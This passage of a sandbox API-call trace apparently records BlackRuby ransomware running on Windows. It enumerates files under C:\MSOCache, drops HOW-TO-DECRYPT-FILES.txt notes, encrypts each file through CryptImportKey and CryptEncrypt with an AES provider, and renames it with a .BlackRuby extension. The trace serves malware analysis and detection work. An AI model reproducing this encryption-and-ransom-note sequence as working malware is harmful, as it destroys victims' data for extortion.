[0046.454] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.454] GetLastError () returned 0x5 [0046.454] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.454] GetLastError () returned 0x5 [0046.454] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.454] GetLastError () returned 0x5 [0046.454] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.454] GetLastError () returned 0x5 [0046.454] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.454] GetLastError () returned 0x12 [0046.454] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0046.455] SetErrorMode (uMode=0x0) returned 0x1 [0046.455] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.455] GetLastError () returned 0x12 [0046.455] SetErrorMode (uMode=0x1) returned 0x0 [0046.455] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0046.456] GetLastError () returned 0x12 [0046.456] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.456] GetLastError () returned 0x12 [0046.456] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.456] GetLastError () returned 0x12 [0046.456] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.456] GetLastError () returned 0x12 [0046.456] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.456] GetLastError () returned 0x12 [0046.456] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.456] GetLastError () returned 0x12 [0046.456] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.456] GetLastError () returned 0x12 [0046.456] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0046.457] SetErrorMode (uMode=0x0) returned 0x1 [0046.457] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.msi", lpFilePart=0x0) returned 0x4d [0046.457] GetLastError () returned 0x12 [0046.457] SetErrorMode (uMode=0x1) returned 0x0 [0046.457] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\projectmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1d34004 | out: lpFileInformation=0x1d34004*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49b10220, ftCreationTime.dwHighDateTime=0x1cbe468, ftLastAccessTime.dwLowDateTime=0x49b10220, ftLastAccessTime.dwHighDateTime=0x1cbe468, ftLastWriteTime.dwLowDateTime=0x89e8b6f0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x1b9400)) returned 1 [0046.458] GetLastError () returned 0x12 [0046.458] SetErrorMode (uMode=0x0) returned 0x1 [0046.462] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.462] GetLastError () returned 0x12 [0046.462] SetErrorMode (uMode=0x1) returned 0x0 [0046.462] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.462] GetLastError () returned 0x0 [0046.462] GetFileType (hFile=0x184) returned 0x1 [0046.462] SetErrorMode (uMode=0x0) returned 0x1 [0046.462] GetFileType (hFile=0x184) returned 0x1 [0046.462] WriteFile (in: hFile=0x184, lpBuffer=0x1b580d4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1b580d4*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0046.465] GetLastError () returned 0x0 [0046.465] CloseHandle (hObject=0x184) returned 1 [0046.465] GetLastError () returned 0x0 [0046.465] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.465] GetLastError () returned 0x0 [0046.465] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0046.466] GetLastError () returned 0x0 [0046.466] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0046.466] GetLastError () returned 0x0 [0046.466] SetErrorMode (uMode=0x1) returned 0x0 [0046.466] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\projectmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b59de0 | out: lpFileInformation=0x1b59de0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49e09da0, ftCreationTime.dwHighDateTime=0x1cbe468, ftLastAccessTime.dwLowDateTime=0x49e09da0, ftLastAccessTime.dwHighDateTime=0x1cbe468, ftLastWriteTime.dwLowDateTime=0x89e8b6f0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x5ab)) returned 1 [0046.466] GetLastError () returned 0x0 [0046.466] SetErrorMode (uMode=0x0) returned 0x1 [0046.466] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0046.466] GetLastError () returned 0x0 [0046.466] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0046.466] GetLastError () returned 0x0 [0046.466] SetErrorMode (uMode=0x1) returned 0x0 [0046.466] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.466] GetLastError () returned 0x0 [0046.466] GetFileType (hFile=0x184) returned 0x1 [0046.466] SetErrorMode (uMode=0x0) returned 0x1 [0046.466] GetFileType (hFile=0x184) returned 0x1 [0046.467] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x5ab [0046.467] GetLastError () returned 0x0 [0046.467] ReadFile (in: hFile=0x184, lpBuffer=0x1b5c1ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b5c1ec*, lpNumberOfBytesRead=0x18ed84*=0x5ab, lpOverlapped=0x0) returned 1 [0046.468] GetLastError () returned 0x0 [0046.468] CloseHandle (hObject=0x184) returned 1 [0046.468] GetLastError () returned 0x0 [0046.468] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0046.468] GetLastError () returned 0x0 [0046.468] SetErrorMode (uMode=0x1) returned 0x0 [0046.468] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\projectmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49e09da0, ftCreationTime.dwHighDateTime=0x1cbe468, ftLastAccessTime.dwLowDateTime=0x49e09da0, ftLastAccessTime.dwHighDateTime=0x1cbe468, ftLastWriteTime.dwLowDateTime=0x89e8b6f0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x5ab)) returned 1 [0046.468] GetLastError () returned 0x0 [0046.468] SetErrorMode (uMode=0x0) returned 0x1 [0046.468] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0046.468] GetLastError () returned 0x0 [0046.502] CryptImportKey (in: hProv=0x37c708, pbData=0x1bb7b84, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d60) returned 1 [0046.502] GetLastError () returned 0x0 [0046.502] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.502] GetLastError () returned 0x0 [0046.507] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.507] GetLastError () returned 0x0 [0046.507] CryptDuplicateKey (in: hKey=0x360d60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0046.507] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.507] GetLastError () returned 0x0 [0046.507] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1be4bd0*=0x1, dwFlags=0x0) returned 1 [0046.507] GetLastError () returned 0x0 [0046.507] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1be4b9c, dwFlags=0x0) returned 1 [0046.507] GetLastError () returned 0x0 [0046.507] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1be4c18*, pdwDataLen=0x18ed74*=0x6a0, dwBufLen=0x6a0 | out: pbData=0x1be4c18*, pdwDataLen=0x18ed74*=0x6a0) returned 1 [0046.507] GetLastError () returned 0x0 [0046.507] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1be5984*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1be5984*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.507] GetLastError () returned 0x0 [0046.507] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1be59b4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1be59b4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.507] GetLastError () returned 0x0 [0046.507] CryptDestroyKey (hKey=0x360d60) returned 1 [0046.507] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.507] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.507] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0046.507] GetLastError () returned 0x0 [0046.507] SetErrorMode (uMode=0x1) returned 0x0 [0046.507] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.508] GetLastError () returned 0xb7 [0046.508] GetFileType (hFile=0x184) returned 0x1 [0046.508] SetErrorMode (uMode=0x0) returned 0x1 [0046.508] GetFileType (hFile=0x184) returned 0x1 [0046.510] CloseHandle (hObject=0x184) returned 1 [0046.510] GetLastError () returned 0xb7 [0046.510] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0046.510] GetLastError () returned 0xb7 [0046.510] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Encrypted_5xPJS4IwuTT30BxX963NZd7FCiGSZEWfuWUwON6.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Encrypted_5xPJS4IwuTT30BxX963NZd7FCiGSZEWfuWUwON6.BlackRuby", lpFilePart=0x0) returned 0x7a [0046.510] GetLastError () returned 0xb7 [0046.510] SetErrorMode (uMode=0x1) returned 0x0 [0046.510] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\projectmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49e09da0, ftCreationTime.dwHighDateTime=0x1cbe468, ftLastAccessTime.dwLowDateTime=0x49e09da0, ftLastAccessTime.dwHighDateTime=0x1cbe468, ftLastWriteTime.dwLowDateTime=0x23ed75a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x6b0)) returned 1 [0046.510] GetLastError () returned 0xb7 [0046.510] SetErrorMode (uMode=0x0) returned 0x1 [0046.510] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Encrypted_5xPJS4IwuTT30BxX963NZd7FCiGSZEWfuWUwON6.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\encrypted_5xpjs4iwutt30bxx963nzd7fcigszewfuwuwon6.blackruby")) returned 1 [0046.511] GetLastError () returned 0xb7 [0046.511] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.511] GetLastError () returned 0xb7 [0046.511] SetErrorMode (uMode=0x1) returned 0x0 [0046.511] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.511] GetLastError () returned 0x5 [0046.512] SetErrorMode (uMode=0x0) returned 0x1 [0046.512] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjLR.cab", lpFilePart=0x0) returned 0x49 [0046.512] GetLastError () returned 0x5 [0046.512] SetErrorMode (uMode=0x1) returned 0x0 [0046.512] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\projlr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c052e4 | out: lpFileInformation=0x1c052e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x493eb850, ftCreationTime.dwHighDateTime=0x1cbe468, ftLastAccessTime.dwLowDateTime=0x493eb850, ftLastAccessTime.dwHighDateTime=0x1cbe468, ftLastWriteTime.dwLowDateTime=0x89f958c0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x7e1c45)) returned 1 [0046.512] GetLastError () returned 0x5 [0046.512] SetErrorMode (uMode=0x0) returned 0x1 [0046.513] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.513] GetLastError () returned 0x5 [0046.513] SetErrorMode (uMode=0x1) returned 0x0 [0046.513] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.513] GetLastError () returned 0x5 [0046.513] SetErrorMode (uMode=0x0) returned 0x1 [0046.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.514] GetLastError () returned 0x5 [0046.514] SetErrorMode (uMode=0x1) returned 0x0 [0046.514] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c2333c | out: lpFileInformation=0x1c2333c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49de53b0, ftCreationTime.dwHighDateTime=0x1cbe468, ftLastAccessTime.dwLowDateTime=0x49de53b0, ftLastAccessTime.dwHighDateTime=0x1cbe468, ftLastWriteTime.dwLowDateTime=0x8a053fa0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x750)) returned 1 [0046.514] GetLastError () returned 0x5 [0046.514] SetErrorMode (uMode=0x0) returned 0x1 [0046.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.514] GetLastError () returned 0x5 [0046.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.514] GetLastError () returned 0x5 [0046.514] SetErrorMode (uMode=0x1) returned 0x0 [0046.514] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.514] GetLastError () returned 0x0 [0046.514] GetFileType (hFile=0x184) returned 0x1 [0046.515] SetErrorMode (uMode=0x0) returned 0x1 [0046.515] GetFileType (hFile=0x184) returned 0x1 [0046.515] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x750 [0046.515] GetLastError () returned 0x0 [0046.515] ReadFile (in: hFile=0x184, lpBuffer=0x1c259f4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c259f4*, lpNumberOfBytesRead=0x18ed84*=0x750, lpOverlapped=0x0) returned 1 [0046.516] GetLastError () returned 0x0 [0046.516] CloseHandle (hObject=0x184) returned 1 [0046.516] GetLastError () returned 0x0 [0046.516] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.516] GetLastError () returned 0x0 [0046.516] SetErrorMode (uMode=0x1) returned 0x0 [0046.516] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49de53b0, ftCreationTime.dwHighDateTime=0x1cbe468, ftLastAccessTime.dwLowDateTime=0x49de53b0, ftLastAccessTime.dwHighDateTime=0x1cbe468, ftLastWriteTime.dwLowDateTime=0x8a053fa0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x750)) returned 1 [0046.516] GetLastError () returned 0x0 [0046.516] SetErrorMode (uMode=0x0) returned 0x1 [0046.527] CryptImportKey (in: hProv=0x37c680, pbData=0x1c8151c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0046.527] GetLastError () returned 0x0 [0046.527] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.527] GetLastError () returned 0x0 [0046.532] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.532] GetLastError () returned 0x0 [0046.532] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e60) returned 1 [0046.532] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.532] GetLastError () returned 0x0 [0046.532] CryptSetKeyParam (hKey=0x360e60, dwParam=0x4, pbData=0x1cae568*=0x1, dwFlags=0x0) returned 1 [0046.532] GetLastError () returned 0x0 [0046.532] CryptSetKeyParam (hKey=0x360e60, dwParam=0x1, pbData=0x1cae534, dwFlags=0x0) returned 1 [0046.532] GetLastError () returned 0x0 [0046.532] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cae5b0*, pdwDataLen=0x18ed74*=0x850, dwBufLen=0x850 | out: pbData=0x1cae5b0*, pdwDataLen=0x18ed74*=0x850) returned 1 [0046.532] GetLastError () returned 0x0 [0046.532] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1caf67c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1caf67c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.532] GetLastError () returned 0x0 [0046.532] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1caf6ac*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1caf6ac*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.532] GetLastError () returned 0x0 [0046.532] CryptDestroyKey (hKey=0x360d20) returned 1 [0046.532] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.532] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.532] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.532] GetLastError () returned 0x0 [0046.532] SetErrorMode (uMode=0x1) returned 0x0 [0046.534] GetFileType (hFile=0x184) returned 0x1 [0046.534] SetErrorMode (uMode=0x0) returned 0x1 [0046.534] GetFileType (hFile=0x184) returned 0x1 [0046.534] WriteFile (in: hFile=0x184, lpBuffer=0x1cb1218*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x18ed58, lpOverlapped=0x0 | out: lpBuffer=0x1cb1218*, lpNumberOfBytesWritten=0x18ed58*=0x860, lpOverlapped=0x0) returned 1 [0046.534] GetLastError () returned 0xb7 [0046.535] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\setup.xml"), 